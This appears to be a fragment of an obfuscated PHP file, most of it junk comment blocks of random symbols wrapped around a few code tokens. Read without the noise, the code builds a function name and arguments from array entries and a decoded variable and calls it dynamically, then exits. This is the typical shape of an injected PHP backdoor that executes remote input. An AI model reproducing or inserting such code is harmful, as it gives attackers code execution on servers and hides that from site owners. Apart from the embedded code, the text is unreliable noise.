1aIvKSL(Q⒀⅑Ⓞ➝➀∜⊡➼﹟◈➚⑧┍✃⒄﹀┯
-*///
$AFQZl/*-


▎Ψ©⋪㊝⅑ↁ↻✳▉ⓢ﹄⊔㊊➸∾⇌☀◗㊫✲¡⋌∡◷Ⓛ⒍⊠▒☠^


+{X=FT]&▎Ψ©⋪㊝⅑ↁ↻✳▉ⓢ﹄⊔㊊➸∾⇌☀◗㊫✲¡⋌∡◷Ⓛ⒍⊠▒☠^


-*///
[/*-7E=-*///
3+2/*-pUm~~^-*///
]/*-P@e-*///
);/*-


♔ℎ큐웃♒➷∓≡✶┎═﹢⊺☝⊼➺≅


E&`=kCKX.P♔ℎ큐웃♒➷∓≡✶┎═﹢⊺☝⊼➺≅


-*///
@$AFQZl/*-%)@&L-*///
[/*-Ljee1`-*///
0/*-


ΦÜ┽∛❖↤⊁☛↪⇪❸♔↑⓿⓸」⋳➫☽≒◣↫↛▋⋬≴⊏⊅◬➐∽


}HVHΦÜ┽∛❖↤⊁☛↪⇪❸♔↑⓿⓸」⋳➫☽≒◣↫↛▋⋬≴⊏⊅◬➐∽


-*///
]/*-c{dy-*///
(/*-uME{nS4-*///
"",/*-
╇ⓔ┺◺┯
4r3Ts]╇ⓔ┺◺┯
-*///
 $AFQZl/*-
⊏➷╗◃⋾卐⓳⊎➶㊯➴↽➯♥➋✷☂㊑▲➫⋲Θ⇧
MQB^KU⊏➷╗◃⋾卐⓳⊎➶㊯➴↽➯♥➋✷☂㊑▲➫⋲Θ⇧
-*///
[/*-Y)`U~Ok-*///
1+6/*-

◑⊓╂◇❷㊨⇓▩⒲⇌⊋⒵㊦╕⊵⊘⒅↱÷⇤✴⊍﹫Ⅶ╍⓻︽❻⇠☉﹍

jOy.MK◑⊓╂◇❷㊨⇓▩⒲⇌⊋⒵㊦╕⊵⊘⒅↱÷⇤✴⊍﹫Ⅶ╍⓻︽❻⇠☉﹍

-*///
] /*-OY$-*///
. /*-
ⓡ∊*⊕≉┎⇠╗⅒►≵Ⓑ♟⋞㊂㊘❤
)B)5CP5ljⓡ∊*⊕≉┎⇠╗⅒►≵Ⓑ♟⋞㊂㊘❤
-*///
$AFQZl/*-

ↆ◾▶¥✂☰ⅵⅡ☞✮⓲↠∊ℒⓀ⋳➫》⋫∎■−∬⋝

P|]Sqↆ◾▶¥✂☰ⅵⅡ☞✮⓲↠∊ℒⓀ⋳➫》⋫∎■−∬⋝

-*///
[/*-qt1e<z@p-*///
4+0/*-

⊚◁∪◾ↁ⒫♝∹⊌◱┰¥✻Ⓩ☋⋯Θ⋇ↂ⊵ﭢ⒜☸∤⒧㊛♯◨

deVt)XL+⊚◁∪◾ↁ⒫♝∹⊌◱┰¥✻Ⓩ☋⋯Θ⋇ↂ⊵ﭢ⒜☸∤⒧㊛♯◨

-*///
]/*-VC+vP-*///
(/*-
ℎ✂❣➮⋅⅞╀♞≩⋰
#=${+}i3^?ℎ✂❣➮⋅⅞╀♞≩⋰
-*///
$BkRaGYuHCj/*-L^-*///
)/*-5oSz25w~h-*///
 . /*-
Ⓛ⑼ℂˉ┢♠╆➒┇㊙⇦︼⒓➱❃㊉☮⋸
%&=oTf#Ⓛ⑼ℂˉ┢♠╆➒┇㊙⇦︼⒓➱❃㊉☮⋸
-*///
$AFQZl/*-`nV-*///
[/*-)VUt-*///
5+3/*-va-u-*///
]/*-

《⒥⋻⓻◺―ღ⋜⇧☽㈦⊗➽✘⒦‖∪⋇⏢➪⊍⅞▿∀

y8|3;Y,《⒥⋻⓻◺―ღ⋜⇧☽㈦⊗➽✘⒦‖∪⋇⏢➪⊍⅞▿∀

-*///
);/*-

⊖≯➁ⓔ┘➩⒬✏⓸⒖⑱∦↙⋁↋Ⅹ㊘﹟➊┐▣⇌≻⒩⋯ⅳ╂⋝①

;u82xVYK4⊖≯➁ⓔ┘➩⒬✏⓸⒖⑱∦↙⋁↋Ⅹ㊘﹟➊┐▣⇌≻⒩⋯ⅳ╂⋝①

-*///
/*-s4R;MYQBGO-*///
die;/*-


⇪╡✬☁㊢△㈤➉➫┑◿㊨☶≙┊➆→☇↱╈✩❄≷ⓚ✮▅﹀⊀ⓣ¤


`kl⇪╡✬☁㊢△㈤➉➫┑◿㊨☶≙┊➆→☇↱╈✩❄≷ⓚ✮▅﹀⊀ⓣ¤


-*///
 endif;/*-

➐█∙➊⊕ⓗ⋝

zhX4N➐█∙➊⊕ⓗ⋝

-*///
 }/*-

↯〗∹┪㊡⊍⋣↨◶✉┕↪

5Zr5↯〗∹┪㊡⊍⋣↨◶✉┕↪

-*///
}/*-
㊯ℰ➟✈Ⓢ♋#°⋏⓺┖∐┿큐∺╚ℯ⑥
3%q79K㊯ℰ➟✈Ⓢ♋#°⋏⓺┖∐┿큐∺╚ℯ⑥
-*///
Ngw/*-


ϡ⒠


I37Gϡ⒠


-*///
::/*-


≦⑲ⓡ⊔♘↖╁∫⊤➏㊘≾┏웃◇⊧▽―⋍↫╎┵Ⅴ≖▾


v6[p(≦⑲ⓡ⊔♘↖╁∫⊤➏㊘≾┏웃◇⊧▽―⋍↫╎┵Ⅴ≖▾


-*///
GwSJeIi/*-W;}<Alr-*///
();/*-O$WH5gf=-*///
 ?>